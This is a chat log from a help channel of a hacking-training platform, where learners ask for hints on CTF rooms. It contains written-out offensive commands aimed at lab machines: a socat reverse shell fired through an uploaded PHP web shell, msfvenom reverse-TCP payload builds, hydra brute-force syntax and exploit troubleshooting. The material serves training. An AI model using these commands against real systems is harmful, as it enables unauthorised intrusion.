#room-hints

cappucino@polonfs:~$ ./.bashrc -p
./.bashrc: line 8: return: can only 'return' from a function or sourced script
cappucino@polonfs:~$ /.bashrc -p
-bash: /.bashrc: No such file or directory

hmmmm, ok, might explain why it's not working for me. Instructions stated to download the bash executable, I googled .bashrc and that seemed to make sense from what I could see. Have I downloaded the wrong file, or have I missed something? Thanks TIA

Gave +1 Rep to @burnt rivet

Ah ok, I think I understand what you mean. I'll give it a go and see

Sorry, I'm getting really confused, as I don't seem to have those files from within the share mount point. I have a terminal connecting via SSH and can see it, there is a way I can download that file to my attackbox machine isn't there? I thought I remembered in a previous module about SSH downloads, but I maybe mixing that up with Telnet or FTP, as I can't seem to find a way to download it

sftp should also work

if you find scp syntax to complex

I've managed to get it copied across now, and it's appearing in the mounted share from my other terminal. Coffee time, then I'll try again with that rather than .bashrc (fingers crossed)

@alpine kestrel @burnt rivet Thankyou, I got there in the end! 🙂

no problem

hey so I am doing John The Ripper room ( https://tryhackme.com/room/johntheripper0 ) and at task 5 question 1, answer was easy to guess because I was looking for 2 characters options, but I still cant get it how was I supposed to know it, can someone give me some hint on how should I actually figure it out ?, I really want to understand the tough process here, even earlier on I was using that python script provided and it was giving me few outputs and I had no good way of actually judging which is the right one, maybe I should use other tools to help me define hashing algorithm used ?

so I suppose the question there is - whats the best way to define hashing algorithm used in order to crack them with John -

i have a question regarding corridor. I solved the challenge. I just wanted clarification on the inner workings

Like what ?

in the walkthrough it gives 2 resources am pretty sure there are other resources but as long as they work it's good

Thanks, I might give that a go, but most importantly I want to make sure I am able to find it myself, while now it was just too easy based on 2 character guess

Gave +1 Rep to @glossy trail

what i do is look for possible hash algorithim, and the type example ''john --list=formats | grep -iF "ntlm" ''

no problems and am also learning and doing the walkthrouh good luck in your journey

It’s my second account, I removed first because of too many walkthroughs;D now I just do my best to understand it all and check for hits as rarely as possible, good luck to you too!

Hi, would be gratefll for some help, Doing Linux Fundementals, Task 6, Using grep command, I cant find the flag, it says file does not exist.

sorry its not letting me attach screen shot.... the command i typed was grep "THM*" access.log

You need to verify to screenshot.

!docs verify

Are you on the correct machine?

Im confident I was on the right machine as I answered the previous question on same machine , loaded from Task 3, I have however terminated machines, closed down browser and started again and .... it worked First time. and thanks Im not verifed 🙂

Well, you are now. 🙂

I did it on the machine and it worked.

Hello Guys,

I'm stuck in the room Pyramid of Pain, Task 5,
They ask me to use the Task 2 tools : VirusTotal etc... to find the malware hidden in the ip of the previous question (35.214.215.33)

On these tools, i cant find any malware or suspicious activy, is it normal ?

thanks

how i can get the flag of streamer? in my name discord

@ripe hedge can maybe give you some clarification on how to obtain the streamer role.

pretty sure you have to be a reasonable well known/influential streamer

like 15k follows its enough? nah?

thx

Good evening folks,
I'm having a very weird problem in the Brianstorm room Task #1 question #2. How many ports are open? Sounds simple to me, but I've scanned the VM on multiple days from both my local machine, the attack box and the Kali VM. Everytime I come up with 3 open ports: 21, 3389, and 9999. The room isn't accepting that as correct. I've used the following commands to no avail:

nc -p- <machine_IP>
nc -p- -Pn <machine_IP>
nc -vvv -p- -Pn <machine_IP>
nc -v -p- -T4 -Pn <machine_IP>

Below is a scan from literally 30 minutes ago. The target IP is the current, still running, VM.

# Nmap 7.60 scan initiated Wed Feb  8 22:20:33 2023 as: nmap -p- -vvv -oN nmap.scan 10.10.89.108
Increasing send delay for 10.10.89.108 from 0 to 5 due to 11 out of 31 dropped probes since last increase.
Increasing send delay for 10.10.89.108 from 5 to 10 due to 11 out of 35 dropped probes since last increase.
Nmap scan report for ip-10-10-89-108.eu-west-1.compute.internal (10.10.89.108)
Host is up, received arp-response (0.00044s latency).
Scanned at 2023-02-08 22:20:33 GMT for 2532s
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT     STATE SERVICE       REASON
21/tcp   open  ftp           syn-ack ttl 128
3389/tcp open  ms-wbt-server syn-ack ttl 128
9999/tcp open  abyss         syn-ack ttl 128
MAC Address: 02:AA:A8:68:21:17 (Unknown)

Read data files from: /usr/bin/../share/nmap
# Nmap done at Wed Feb  8 23:02:46 2023 -- 1 IP address (1 host up) scanned in 2532.47 seconds

Am I missing something really dumb, or is there a glitch in the room?

Many thnaks for the help.

yeah think that one is bugged if shadow recalls correctly

you can probably guess the number if you try

or you can check for udp ports

It's a single digit, so yeah I can guess it, but I wanted to ensure that I wasn't missing some learning point.

yeah that is fair

though the main purpose of that room is not to have fun with nmap but the priv esc

Over the last week I think I tried UDP scans, but it isn't in my notes. I'll give that a try again. Yeah I redid BOF_Prep like 5 times. New to Buffer Overflows, and I wanted to get it down. Brainstorm is the first time I've tried a download the program and run it locally. I'm looking forward to it.

Thanks @alpine kestrel

Gave +1 Rep to @alpine kestrel

hello everyone, i'm doing the agent sudo room, and i'm stuck at task 5, i can't find the CVE relative to the target kernel, i've searched in the websites that the exploit vulnerabilities room suggests but i couldn't find it. any websites suggestions to look at??

it is not a kernel vulnerability... check the version of sudo and you might be able to figure it out

also try and run sudo -l and search a bit about said output

ooh thank you very much @alpine kestrel

Gave +1 Rep to @alpine kestrel

no problem.... assume you got it now???

i got root but i still can't find the damn CVE lol ^^

if you are using exploit-db it states the cve on the exploit page

i tried all the relative cve that i found in exploit-db but none of them work, but i was looking using the kernel, i'll try with this vuln

yeah then maybe you did not get root the intended way

after all this room is quite old so it is vulnerable to quite a few exploits that are newer then the room

the intended one uses the sudo binary

which shadow thought the room name made obvious

hi all, working through Linux fundamentals part2-task 2, and cant log in using the password in the video, tried several times? have checked typing password in lower case, and its the only machine I can access in this lesson, any ideas would be helpful.

I just logged in so it's working.

So where im i going wrong.?????.

you are missing @

ssh tryhackme@{MachineIP}

i missed the "@"

Thanks 🙂

Looking for some advice on the linux priv esc task 11 NFS.

I can mount the share on the remote machine, create the file and compile the exploit on my kali laptop, copy it over, set it +s but when i try to run it from the machine itself, i get a GCC error

GLIB_C error

but i assumed it was compiled correctly on my machine when i made the exploit as there was nothing mentioned otherwise

gonna terminate it and start again

$ cd tmp
$ ls
nfs
snap.lxd
$ ./nfs
./nfs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./nfs)

i take it the VM has an old version compared to kali?

Hello everyone,

I need a hint or the command to get the information for the OWASP room, Title Injection v4, Task 5 (Command Injection Practical), question How many non-root/non-service/non-daemon users are there?

I did a search of a command and did a "cat /etc/passwd" and receive a list of users but not sure if I'm reading the output correctly to form a correct response to the answer.

First, do I have the right command/request to get the output I need, and second what am I looking for or how do I parse the output?

hey everyone. Im on 'Windows Local Persistence". Is this room buggy? I have been working this room for some time. Some times the exploits will not run. I have tried to run some tasks more than once to fully understand them, but they only work when they want to. I have checked my history to make sure I have duplicated the command correctly, But the room sometimes works and mostly it does not. any help please.

You have the correct command, check how /etc/passwd is made and where users are

Hi there got issue with operating system security room

Wont let me enter password

hi can anybody help me with DVWA installation

Hey all! Completed the python for pentesters room just this week and went on to https://tryhackme.com/room/scripting, got through base64 even though that was a hassle too since i thought my script was messed up since the first 5 letters didnt change in around the first 30 loops.. But on to the problem i have atm in https://github.com/JormaWuorio/TryHackme/blob/master/gottacatchthemall.py.. I can get the ip and portnumber which i succesfully connect to, but when i get to the looping part, i can randomly get through 1-3 operations and i cant for the life of me figure out the reason.. stacktrace is printing out something about connection refused, but i cant get to the root reason why its disconnecting at sometimes and on others its not.. im also waiting for 4s on each loop so it should switch only after the port has closed.. also tried with 3 and 4.1 to try and compensate for lag and such but no dice.. One possible problem i have is im doing the loop with requests instead of sockets but somehow i doubt thats the case, even though im not sure where do i get the info to STOP if the port number is still not 9765.. Any tips on what to try?

Hi, still stuck with the 'Taunt' section of #Sakura room. I have the latest url of the deep web site as of today but the url is not working / saying the answer is correct. Anyone?

Anyone have any insight on https://tryhackme.com/room/crypted ?

I have the img file indexed and have looked everywhere I can think of for task one, even cracked 2 of the passwords in the shadow file but no luck with the right answer

I’m in Steel Mountain, Task 4. I downloaded the exploit, and adjusted the IP and Port. I still can’t get a connection with http.server. What am I doing wrong? I also keep seeing a lot of people skip this particular exercise. So it’s starting to make me wonder 🤔

it says the file is not found. Are you in the right directory and have the right file name ?

I have done this part so i'm sure it works fine.

Yep, copied and pasted the raw code from GitHub into nano. Made the necessary changes, and still nothing. Tried it like three different ways. I found other YouTube videos where other people have had similar issues, and they all skipped over this Task.

Dm me. I'll help you out with this.

I already closed everything. I appreciate you offering to help. You’re welcomed to DM me what I should do, though. But I followed three other YouTube videos, and all of them skipped over Task 4. They all said they were running into problems with it.

I copied the raw code from GitHub, and saved it as exploit.py after changing the IP address and Port. I started netcat listener in one terminal, and http.server in another. Did python2 exploit.py <target ip> 8080. And I got this error message.

just a sec. I am trying to find something that will help you. I already have it in this chat.

Sweet, thank you 🙂

Gave +1 Rep to @pine dust

Check your DM. Hope it helps.

Wow.
Do you mind giving me a hint ? I have been at it for long time.

Not sure where you are at with it but you have to mount the NFS server to get the img file. You can either use strings to search the binary or use something like Autopsy to index it. But there are some encrypted files inside the img that seem to be the only ones of importance and I don't know how to go about decrypting them (no clue what the encryption type is or the passcode/IV - I have some ideas of what I can check on next but I definitely need a break from it for a bit

Thanks. I do have the img file and tried using autopsy but I then moved on to learning autopsy first so I left this task. I am on to task 2. Any hint for this ?

Gave +1 Rep to @civic pilot

I was trying to exploit SMB since I didn't have much luck with web enumeration. But both seem like a dead end at the moment. Not sure when I'll come back to it yet

hello i am finishing Rick and MortyCTF and im trying to connect to ssh but i have this error R1ckRul3s@10.10.1.36: Permission denied (publickey). Am i on the right track?

okay than you

I am stuck at volatility. I try to run any command with

'python3 vol.py -f <file> <plugin>'

however it throws me an error that vol.py does not exist, I am stuck in this damn room for a while now. Can someone tell me I am not crazy and just did a typo or so, please?

Hi, the error message is telling you what the issue is. Is there a file called vol.py in that directory?

I dunno, ls doesn't work. I am using precisely the command I was told to use?

Could you share some screenshots please? And room url + task so that I can have a look 🙂

sure, I have to restart the VM

this might take a moment -/

Are you using the attackbox or your own VM?

I am using the deployable machine in Task 3

https://tryhackme.com/room/volatility
Task 10, commands are found at 9 8 7 6

Btw. thank you for your help :)

In comparison

You are not in the right directory

When running a python command, you need to be in the directory that contains the file, or specify the full path to the file in your command

I tried to go to /opt/volatility3 too

ah no nevermind when I did that I had a typo

thank you for your help

no worries 🙂 and you mentioned using "ls" earlier on and not seeing anything, you can use something like ls -la. This will list all files (even hidden ones)

uh, thank you for the tip! I will be sure to remember that. Thanks =)

Oh, another tip, you can use "tab" to autocomplete when you're typing file paths on the terminal. This can indicate if there is a typo or if the path is incorrect.

I didn't know that, thank you! That's a real time saver!

Gave +1 Rep to @unborn moon

Hello can anyone tell me about this problem in part 1 of windows fundementals

"What is the keyboard shortcut to open Task Manager?"

i respond ctrl shift esc

and it's wrong

Tried "Control+shift+escape"?

add '+' chars in between the words

it will do it

thx

Gave +1 Rep to @rustic sphinx

it counts even when i put a backslash

can't rdp to the windows fundementals machine

path can be either relative or absolute, the python binary is smart enough to parse which is being passed

Thanks Juun, should've specified 🙂

Gave +1 Rep to @umbral umbra

it's all good, today has been a day of ridiculous meetings. My pedantic-antics level is off the charts because of it.

Haha, no worries!

hi , I try on BOF perp in level 3 and when i give the address in EIP to jump to ESP its not work ! for example i sent this address "\xc7\x11\x50\x62 on the immunity change the address and output like this 620D0AC7

hello how to get to login.php in Rick and Morty Capture the flag?

Have you tried your favourite forced directory browser?

Hi guys, I am trying to crack the private ssh key using johntheripper. When I am giving this command -
python ssh2john.py id_rsa > id_rsa.hash
It is giving me the following error - :
[id_rsa] couldn't parse the keyfile.

Where am I going wrong?

Can you share a screenshot of id_rsa ?

Just now I realized I only copied the main text, not the info like AES , begin ,end etc.

Thanks @pine dust

Gave +1 Rep to @pine dust

Hi,
i'm stucked whith a step in Relevant chall
does anybody has 5min to help me pinpoint it ?
trying to exploit my finding and cannot get a shell...

nobody for a hint for MSF ?

what room

I do relevant and i try to exploit one of the vuln without success since 1h

can you link the room

https://tryhackme.com/room/relevant

!docs verify

hmm

i didnt do that room. so can't tell for sure. sry

check #start-here to help you start

maybe i just use msf wrong

looks all good but i never get the reverse shell and the VM crash 😦

[*] 10.10.230.156:445 - Receiving response from exploit packet
[-] 10.10.230.156:445 - Did not receive a response from exploit packet

https://tryhackme.com/room/windowslocalpersistence is broken if you are trying it on a Mac. I can’t get Sticky Keys to trigger. Can someone please tell me what flags 14, 15, 16 are? I’m getting frustrated with this broken room!!!

Why can't you get sticky keys to work?

Evening all.... I'm stuggling with task 4 on https://tryhackme.com/room/authenticationbypass
I think I am missing a step or something, as I haven't seen a popup, or change on the site after running the code in terminal. Is it supposed to give me a new webpage with the changes? There's an image on the task showing a change of email address, but I am not 100% sure how that happens :/
I tried to copy the outputted code, create an html file, but that didn't seem to work either, so I am a little lost.
Any pointers where I'm going wrong would be greatly appreciated

Hey guys I'm stock with Walking An Application course Task3 Question 3.

I need dome help

I mean some help

i am stucked on tryhackme shaker room,any tip?

What have you tried so far?

Where are you in the Shaker room exactly?

@young gulch i have compile exploit.java and upload exploit.xml on server,i have setup listener to 8888 and get exploit.class but i can't get reverse shell

i follow those steps for ldap marshaller

https://hydrashead.net/posts/thm-shaker/

Do you understand how the exploit should work?

no exactly but i follow the steps😆

i have compile the exploit.java with latest jdk-default,17 version

no errors return

anyone can help me with brainstorm room? i downloaded chatserver.exe but i cannot open it on immunity debugger its saying i need 64bit

Are you using a 32bit system?

https://tryhackme.com/room/exploitingavulnerabilityv2

Last task

I ran searchsploit the server version and am having trouble running the exploits

hol up I'll do the room real quick

Thanks for the help in advance !

where are you stuck?

running the exploit?

can you post the command youre trying to execute?

@knotty peak

before my issue was i forgot to put python3 before running the python script but after I realized that I noticed that the code didnt make sense to me the comments are a little hard to read

I found an exploit written in C and can understand it a bit better

but I do not understand what I have to change to get it to work in my case

I got it with the python script so I can help you with that if you want to try it again

yea sure

ok so what were you executing?

since I couldnt read the code that smoothly I tried just running it with no changes and when I got the error:

File "29316.py", line 109 print "-> n0 w3bs3rv3r 0n %s" % (args.h) ^ SyntaxError: invalid syntax

how did you find out what script to run?

i ran nmap on the target machine to find the version used for the http service than used that to find exploits on searchsploit

So the room usually helps you find the way to exploit the vuln going back to question one for Task 5 start there

I can also hop in voice and help you there if you want to ask more questions

In the library rn so I wouldnt be able to talk but I could listen if its easier than typing everything

I'm fine with typing library probably not that great with talking 😄

Okay yea lmao. I appreciate the help

No problem 🙂

Oh this is a lot better an easier then what I was doing lmao gotta remember not everything is super complicated

yeah I seem to be doing the same more often than not

I am able to get the exploit to work

thank you sm

if you dont mind I can send you a dm of the code i was trying to work with lmaoo

Haha no problem, yeah sure kinda curious 😄

How do I do the plus rep thing here

Uh i think replying to me saying thanks work or +rep @<user>

+rep @magic moon

Gave +1 Rep to @magic moon

Again thank you for the help! 🫡

I will def bother you/this channel later so bye for now lmao

anytime 🙂 bye bye

Good morning all, curious question - How do I chase up a request for hint/help if I've not had a response? I don't want to be seen as spamming :/
Many thanks in advance

When/Where did you post it?

#room-hints message

sorry if i'm a bit cack-handed here, still trying to get used to discord

What are you trying to do?

I'm not a subscriber, so I cannot access the material.

oh ok, it's supposed to be exploiting a logic flaw in a website, and using curl, it should change what I see on the website, but I don't get that. I'm not sure if it is supposed to happen automatically, or if I need to reload the website somehow? I'm a little lost...

Make sure you are checking the right account's support tickets

hiya, sorry I'm not quite sure what you mean. Do you mean checking the right rooms? I posted in both the room-hints, and room-help, but not in the subs-room-help

I am talking about in the room for the logic flaw

Where are you stuck

after i made a curl request, the webpage didnt change

curl request 1 or 2

2, from what i can gather it's supposed to change the email address in the web page message

can you send the curl command you are using

curl 'http://MACHINE_IP/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=attacker@hacker.com' used the example code

what message are you seeing

are changing machine_ip to the real one?

yeah, changed the ip address, i didnt receive any errors from the terminal, or on the website. I was expecting the message on te website to change to the attacker@hacker.com email address

I think you are good

Could someone give me a hint for KoTH Hackers on an entry point? I seem to be stuck bruteforcing my way in currently.

Also im not 100% certain my hydra syntax is correct for the ||/backdoor|| form

Could someone help me with this room https://tryhackme.com/room/metasploitexploitation#

I am on task 5

I looked at the hint and every time i try the exploit i am told the system isnt vulnerable

...login.php?

thats a 404

You're running hydra against that page.

And it's a 404.

oh my god

pain

shouldn't have reused commands from history

The issue appears to be the kali linux machine does not work but the attack box does.

hi guys i am having a problem in brainstorm room for bufferoverflow
i have tested the chatserver.exe and the script run perfect on local ip and i get a shell
when i change the script to my target machine ip i dont get a shell very weird any suggestion? i tried to restart the machine 2 times and still same

nvm worked it was the openvpn problem!! thank you guys

Hello, I can't finish this question in the "OSINT DOJO" room.
Everything I have tried has not worked.
Can someone help me ?

Check the hint.

Follow the link and check the image. Use the url from there as your answer.

Thank you for your answer. I tried with the url we find on the hint image, but it didn't work as well as the other answer I could find. That's why I'm asking for help on this discord...

Gave +1 Rep to @pine dust

Did you include the hash as well ?

Yes i did, I tried with the hash you can see on the image and the hash we can find on the different writeup.

DM me your answer.

The one with hash from the image. i want to see what's wrong.

This is my answer :
||http://deepv2w7p33xa4pwxzwi2ps4i62gfxpyp44ezibmpttxz3owlspAljid.onion/show.php?md5=b2b37b3c106eb3f86e2340a3050968e2||

Just a few characters wrong buddy. Also mark this message as spoiler please.

You have used i instead of j in 2 places.

Thanks for the answer ! It must be the text extractor that replaced it...
Sorry for bothering you with a problem like this.

Gave +1 Rep to @pine dust

Nah, It's fine. Happened with me as well when i used my camera to detect the text.

hahaha, it happens to the best, I guess.

Hi, is this where I can get help with the Linux Modules room? I'm on task 6 awk and I managed to get the required output exactly but they insist on the answer being in another format. I've tried reading all the links in the task including some of my own which I found online but I can't find the answer in the format that is required to pass. [edit] My answer is actually shorter than the required format.

Can you link the room?

Wow that was quick! Thanks! https://tryhackme.com/room/linuxmodules [Edit]It is task 6 awk the first question. I got the second question correct. [Edit2]Pardon me, it's the second question which is giving me problem, I got the third one correct.

hello i need help

https://tryhackme.com/room/windowseventlogs

they ask me to Execute the command from Example 8. Instead of the string Policy search for PowerShell. What is the name of the 3rd log provider?

Hello
I have a strange result from the nikto command in the room https://tryhackme.com/room/toolsrus
I use the command : nikto -h <server>:1234/manager/html -id bob:<password>
It says that the connection was successfully authenticated but the result only says that 1 Tomcat documentation was found but the expected value is 5 (I'd seen a writeup doying the same command and having another result)

Can someone explain what this command does the room isnt too helpful

socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes

Sets ups listener via windows socat

Hi guys, Im stuck on a question that I know is easy but having hard time figuring it out. Jr Pentesting / Walking An Application / Task 3 Viewing The Page Source / 3rd Question..... What is the directory listing flag? Thank you for your help.

Hey, what are you having a hard time figuring out? What have you tried? The more info you give us, the better we can help you 🙂

The question asks "What is the directory flag?" I am having trouble identifying the directory and therefore am not sure where to look for the flag. Hope that helps

What have you tried doing to identify the directory? Did you try using a tool?

ive opened all css/js files from page source. I also navigated through website and viewed all source code for those pages.

also added /.nav-collapse at end of url

also fount flags for THM Static Labs & THM{CHANGE_DEFAULT_CREDENTIALS}

Hey, sorry was on the plane. You still need help?

unfortunately, yes

i tried adding /.nav-collapse at end of url and was redirected to Page Not Found. I then opened all links on source code but did not find flag. Also, viewed all pages to website and opened those source codes but no luck. I thought it would be the same process as the previous question "secret flag" but still stuck

OMG i got it. thank you ALL for the help, much appreciated.

OMG i got it. thank you ALL for the help, much appreciated.

Gave +1 Rep to @unborn moon

@stuck fractal Here's the error I wanted to show you:

Do you know what this is?

What's your port forward?

What do you mean?

I'm using ssh -L 2049:10.10.209.245:2049 -L 111:10.10.209.245:111 -L 20048:10.10.209.245:20048 paradox@10.10.209.245 -i id_rsa

That's a lot more than you need for the version of NFS in use

The IP that you use in the -L argument was important, I found

That's the box IP

It is.

First thing I'd look at is how to mount NFS||v4||

So it should link my own localhost port to the localhost of the box, right?

Isn't it mount -t ntfs REMOTE_SHARE place_in_my_system?

So in this case, mount -t ntfs 127.0.0.1:/home/james /tmp/share_here

Definitely not -t ntfs

It's not ntfs

oops

nfs

my bad haha, typing error

Wait, I made that typing mistake in the earlier commands

thanks for your help haha

iirc it'll only talk v4

Yep yep

It still doesn't want to work though ;-;

I think it's your pivot

You only need to forward one port, and the IP in the middle of the -L matters

only the 111? I'll try

No

The 2049?

Have you read into the changes from v3 to v4?

I now have

I've tried it with every port, but it isn't working

Thanks for your help @stuck fractal :)

Gave +1 Rep to @stuck fractal

@quick holly Please don't post images with flags in

Was there a flag?

oh shit, my bad haha

sorry :<

@quick holly I think you get it what to do next!

I've actually found it

Hydra had an issue because it was version 9.1

so I've reinstalled it to 9.5

and I got the password using

hydra -l jason_test_account -P list.txt 10.10.204.250 http-post-form "/console/mfa.php:code=^PASS^:H=Cookie: PHPSESSID=l6jjj91qbp4867sesgnso2ti78; user=jason_test_account; pwd=abkr:Incorrect" -I -V

Thanks a lot for your help though :)

I appreciate it

Hydra version 9.1 gets stuck on HTTP-POST-FORM requests

No problem

I'll continue the room tomorrow (probably)

okay bro

I'll see you then :)

yeah okay

but don't you think that bash scripting is easy to deal with?

It is

It was probably the right call to make back there

But I really want to get better at Hydra

so I'll push myself to use it more

and I think I found the reason why I was getting stuck everywhere haha

okay

Hello all! I'm in the Protocols and Servers room, Task 4: File Transfer Protocol. I'm able to connect to the target machine using FTP but am unable to grab the flag because it's saying permission denied. halp?

hi

Hey hey

I can help, if you'd like

But I need some more information

What username and password did you use?

and what exact commands did you run?

Hiya

Can someone assist me with the Windows Forensics 1 room?

I found the complete path where the python installer was run but having issues with the answer format

What is your answer ?

One sec

Let me paste here

Mark it as spoiler.

Of course

Please give me a few need to re-pull the registry

Sure

||c:\users\thm-4n6\appdata\local\package cache{3182483d-078b-48fa-92c2-798baa1fe27d}\python-3.8.2.exe||

@pine dust ^

Don't you think it's longer than the expected answer. Look at the * in the input field.

no doubt I just dont..

wait

think I found it but there is something I'm not understanding

||z:\setups\python-3.8.2.exe||

why?

why the ||UserAssist|| artifact?

I thought I should be looking at ||AmCache||

I'm not smart enough to explain why. I guess i know why but i can be wrong.

give it a go

so the question asks about installation path... so I thought ||AmCache|| gives me that so for sure I'll look at that hive

but then it ends up being under ||NTUSER.DAT||... maybe I dont understand the type of info this hive can give me

Hello

Hey hey

If you need some help, it's best to ask and wait for an answer

they asked in #general and got guided here when their problem is with another ctf or cert exam thingy

Ah, I see

What do you need help with @serene slate ?

Lol. Shadow just told you.

for operating security i am trying to input sammies password after inputing his ip in the attackbox and it's not working

been stuck on it since thursday

can someone help me in this question from AV evasion module from Red teaming paath.

How do you view files in hex

On Linux fundamentals part 3 I went to wget the file I need to finish the questions it just loads forever

Have you started the python server on the correct directory?

I posted a more info about it in the subs-room

Cool, I can't see that room, so someone will help you there.

I was confused by this task - Firewalls Task 7
I don't fully understand where I should run the listener?
And what do they mean by localhost?
I drive into the command line on the server:
ncat -lvlp 8008 -c "ncap 10.11.7.31 80"
or
ncat -lvnp 8008 -c "ncat localhost 80"
And I have to send the command from my attacking machine:
nc 10.10.180.167 80
nc 10.10.180.167 8008
?My head is swollen.
Please help me figure out who passed it.

Hi All, I just completed the vulnerability capstone (https://tryhackme.com/room/vulnerabilitycapstone) which was a lot of fun. The only thing I struggled with was finding the correct exploit to use. I got a bit too focused on the wrong exploit (https://www.exploit-db.com/exploits/49487). I eventually used a hint and it had a completely different exploit in it (which worked immediately).

So my question is - how was I supposed to find this exploit? The way I found the others was to use the command searchsploit fuel but given that the exploit in the hint doesn't have the word fuel in it, I'd guess I'd need to use something more like this: ``find / -type f -exec grep -H 'fuel' {} ;`

Is this correct or am I doing this totally inefficiently? Thanks for any hints!

Hi All! I'm in the Network Services room, Task 6: Enumerating Telnet. I'm trying to scan the target but it's taking an hour or more for nmap to finish. Just wondering if this is normal or if I'm using the wrong flags. This is the command: nmap -vv -sS -p- [ip]

It will take ages because you're scanning all 65+K ports.

You can also speed flags in the form of -T1-5 1 being the slowest, 5 being the fastest.

I'd suggest you just do

nmap -T4 -p- $targetip

Thanks! I'll try that

hey im doing the bugged room. I have figured out most of it but not sure on certain parts

Have a look in #1081290200128434256

thanks! I figured out anyway. Very interesting room.

Gave +1 Rep to @lucid junco

I am having issue with this room https://tryhackme.com/room/introtoshells#

I am would like some help on how to upload a precompiled socat binary inorder to set up a socat bind shell

Steps followed:
Uploaded a php file that allows me to send commands via the url
Uploaded a socat binary (found in the room)
Set up a reverse shell on my computer using socat TCP-L:4444 FILE:'tty',raw,echo=0

I then tried this http://TARGETIP/uploads/rshell.php?cmd=socat%20TCP%3AATTACKBOXIP%3A4444%20EXEC%3A%22bash%20-li%22%2Cpty%2Cstderr%2Csigint%2Csetsid%2Csane

I then get an error socat[11708] E open("tty", 02, 0666): No such file or directory

I understand what the error is saying but I dont know where the file is supposed to be

The room says " we are passing in the current tty file" but I am not sure what file it is refrencing

It's supposed to be backticks

Like `

not sure what you mean

tty is a command

Replace the single quotes with backticks

Hi guys

I’m stuck in Network Services task 4

can someone help me please ?

What is your issue? 🙂

You'll get an answer faster if you just state the issue.

I don’t understand how to look to the interesting documents on th SMB part

I see we could try to connect with Anonymous account

But I don’t know how I can find the password

Anonymous doesn't need one.

Just hit enter. 🙂

I'm sure the task description mentions it, but not 100%

I got this when I push enter :
||root@ip-10-10-54-146:~# smbclient //10.10.55.152/secret -U Anonymous -p 445 WARNING: The "syslog" option is deprecated Enter WORKGROUP\Anonymous's password: tree connect failed: NT_STATUS_BAD_NETWORK_NAME||

smbclient //10.10.55.152/profiles -U Anonymous

Try that command 😄

Sorry, that wink face seems patronising.

thanks

Did it work? 🙂

yes

Sorry I change my keyboard...

🙂

You had /secret in your ip.

Secret was only used on the last question as an example of the syntax you'd use. 🙂

Why do we have to go to profiles and not secret ?

Ok thanks

But in that case, when we type //10.10.55.152/profiles is it not to specify the directory where we want to connect ?

Yes. During the enumeration stage, profiles was a share that stuck out.

👍

Which commands can we use when we are connected ?

I would like to use cat or something to read text files... 😅

I think more is used to read files in smb.

good one thanks

more "filename.txt"

Speech marks are needed.

I tried less 😅

Did that work?

Sometimes I can only remember the commands when I'm on it 😂

yes perfect 😉

Sorry to bother you @lucid junco but... How can I download a file... scp doesn't work and scopy doesn't seem to be the one...

Do you need to download the file, or just read it?

download it

Here the instructions :
Download this file to your local machine, and change the permissions to "600" using "chmod 600 [file]".
Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.

Thank you so much

Gave +1 Rep to @young gulch

I think it's mget or get

Hi, can someone point out what am i doing wrong?

Thanks, when you said it i noticed it instantly i ident select the actual file 😄

Gave +1 Rep to @burnt rivet

Hi, I'm running this command

msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe -o shell.exe -a x64 --platform windows LHOST=10.10.250.29 LPORT=1234

Then when I transfer the file over to Windows and run it I get: This app can't run on your PC. To find a version with your PC, check with the software publisher.

Can anyone see anything I'm doing wrong here. The windows box is a THM box for this specific exercise and I've confirmed it's x64 arch. All the walkthroughs say this should work but alas not!

just for the meeps of it try x32/x86

Thanks for the reply - On it! I'll report back.

Gave +1 Rep to @alpine kestrel

Darn - same thing! I used this command: msfvenom -p windows/meterpreter_reverse_tcp -f exe -o shell32.exe LHOST=10.10.250.29 LPORT=1234. Really strange.

well it was worth a shot

agreed! Thanks for the suggestions.

At this point I'm wondering if I've hit some sort of a bug or something. Like maybe the THM box isn't working the way it should. The online guides seem to have no problems with this exercise

Gave +1 Rep to @alpine kestrel

thanks for the input! I was using a multi/handler and ran set payload windows/x64/meterpreter/reverse_tcp then show options. Nothing really stood out to help here to be honest. I actually can't even get to the stage where the EXE even tries to hit the handler, it just fails to load entirely

Gave +1 Rep to @burnt rivet

Ok I'll double check that again now, thanks

darn - same thing. I tried with a multihandler and a netcat listener. No traffic from that windows box on that port at all, so I'm pretty sure the exe isn't even starting. I'm going to look into wether there's a debug output or something I can tap into for the exe to see if it's doing anything weird

+Rep @lucid junco

Gave +1 Rep to @lucid junco

I found some search code and used it to filter but most of the videos on YT just show the log/answer. You have to use the -Path "C:\Users\Administrator\Desktop\merged.evtx" instead of -LogName https://kurtroggen.wordpress.com/2017/05/17/powershell-security-powershell-downgrade-attacks/

I'm a little confused? 🤔 keep saying am wrong by inputting Suite or Updates

Hey, the answer format is 4 characters, so both those answers can't be correct

I understand that, but nothing is 4 character long, that's where am stuck.

What room and task is it? Have you found anything online?

burp suite room task 7, not I have not looked yet, don't want to just get it off the net, rather someone who might know might simply give me a hint

The answer is in the text above the questions

Thank you 😄 "MISc"

Gave +1 Rep to @unborn moon

There is a section that discuses the 4 main sub sections of the user options tab

Hey all ,need some help ,
Basic Malware RE task2
i use my own kali and i download the file and use the strings command and inject it to txt file then sort it but how I find the right flag?
on the internet i find many use "ida" tool but i don't have it on my kali

i'm doing the room using ghidra (a free alternative, you can install it following the steps here: https://github.com/NationalSecurityAgency/ghidra#install)

starting on the first function of strings2.exe (entry)

yes ,thanks i fing a git calon in github

and use a guide i find

it is interesting but for first time like "where i start"

there are some declarations, starting with a char and ending with a pointer
||the undefined variables get hexadecimals values which u need to use a converter to get the flag back, the first variable u already have, it's a F||
as follows:
||| local_2c = 'F';||
||local_2b = 0x4c;||
||local_2a = 0x41;||
etc

||with all values being one byte long, u can assume they are ascii chars||

Im working on the what the shell room and the task where I am to try one of the payloads from the payload of all things github and I am a bit confused on how to use them

I created a .elf file but I am not sure how I am supposed to use it for a meterpreter shell

What payload did you use?

Linux Stageless reverse TCP

Post the full name of it please e.g linux/....

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f elf >reverse.elf

That's not a meterpreter payload, thus the shell you catch is not a meterpreter shell

So all I would need is a normal nc listner?

